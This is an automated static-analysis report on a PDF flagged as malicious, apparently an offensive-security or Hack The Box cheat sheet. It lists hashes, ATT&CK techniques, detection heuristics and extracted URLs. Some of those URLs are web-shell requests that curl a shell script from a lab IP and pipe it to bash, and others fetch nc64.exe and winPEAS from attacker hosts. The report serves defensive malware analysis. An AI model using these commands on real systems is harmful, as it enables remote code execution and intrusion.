Malicious PDF — malware analysis report

Static analysis result for SHA-256 01789cc6c0331ba6…

MALICIOUS

PDF

1.05 MB Created: 2023-03-26 15:28:46 -05:00 Authoring application: Microsoft® Word 2019 First seen: 2023-03-27
MD5: 328b9627c9698d3dd24b4cc99601b6ab SHA-1: 0fff42794b188d54c33596d762a61846f31d35c9 SHA-256: 01789cc6c0331ba663d6811ad3ddff9db4bf7df9658749a932453959e629cc09
164 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The PDF contains direct links to executables like nc64.exe and uses commands to download and execute shell scripts, indicating a downloader or initial access payload. The presence of a password-protected archive lure suggests an attempt to bypass security controls. The techniques observed point towards a multi-stage attack aiming to establish remote access.

Machine Learning

  • Nyx PDF Classifier clean score 0.0001

Heuristics 6

  • PDF link points directly to executable/archive payload critical PDF_DIRECT_PAYLOAD_LINK
    PDF contains a clickable HTTP(S) URI whose path ends in an executable, script, shortcut, disk image, or archive extension. Documents can legitimately link to installers, so this is a high-risk delivery indicator rather than a standalone exploit fingerprint.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Clickable URI points to raw IP address medium PDF_URI_IP_LITERAL
    PDF contains a clickable HTTP(S) action whose host is a literal IPv4 address. Legitimate documents normally link to named domains; raw-IP destinations are common in disposable phishing and malware-delivery infrastructure.
  • External URI info PDF_URI
    PDF contains an external URL action
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://github.com/Anonimo501/LFI_diccionarios
    • https://github.com/Anonimo501/Auto_Wordlists_LFI
    • http://unika.htb/index.php?page=//10.10.14.134/algoquenoexista
    • https://www.revshells.com/
    • http://example.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash
    • http://example.htb/shell.php?cmd=curl%2010.10.14.134:8000/shell.sh|sh
    • https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------
    • http://10.10.15.40/nc64.exe%20-outfile%20nc64.exe
    • http://10.10.14.9/winPEASx64.exe%20-outfile%20winPEASx64.exe
    • https://github.com/Anonimo501/SecLists
    • https://example/
    • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
    • https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
    • https://github.com/Anonimo501/Linux-Privilege-Escalation-Basics
    • https://github.com/swisskyrepo/PayloadsAllTheThings
    • https://github.com/carlospolop/PEASS-ng
    • https://github.com/IvanGlinkin/AutoSUID
    • https://github.com/sleventyeleven/linuxprivchecker
    • http://IP:Port/nombre-archivo.sh
    • http://SERVER_IP:PORT/FUZZ
    • http://SERVER_IP:PORT/indexFUZZ
    • http://SERVER_IP:PORT/blog/FUZZ.php
    • https://fuzz.hackthebox.eu/
    • https://www.revshells.com
    • http://admin:admin@
    • http://s3.thetoppers.htb
    • https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403-------------
    • http://10.10.15.40/nc64.exe
    • http://10.10.14.9/winPEASx64.exe
    • https://github.com/carlospolop/PEASS-
    • https://gist.github.com/egre55/c058744a4240af6515eb32b
    • https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    • https://FUZZ.hackthebox.eu/
    • http://academy.htb:PORT/
    • http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key
    • http://admin.academy.htb:PORT/admin/admin.php
    • http://10.10.10.32:443
    • http://10.10.10.32/nc.exe
    • https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
    • https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1
    • http://IP-Atacante:8000/upload
    • http://IP-Atacante:8000/
    • http://example.com/
    • http://example.com/shell.php?cmd=whoami
    • https://gtfobins.github.io/
    • http://example.com
    • https://example.com
    • https://www.example.com
    • https://gtfobins.github.io
    • http://www.example.com
    +17 more URL(s)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
stream_023_off0005cc84.bin
369f0e1f60d510718703d470284643c3cbba43a5e6db8398ec3b000826b679ed		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x5CC84 1809522 bytes
stream_033_off000cd5e8.bin
c1f3a521b298a0b8d92a22e36129fbc71675de9c462615b1111151634f674201		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0xCD5E8 175564 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.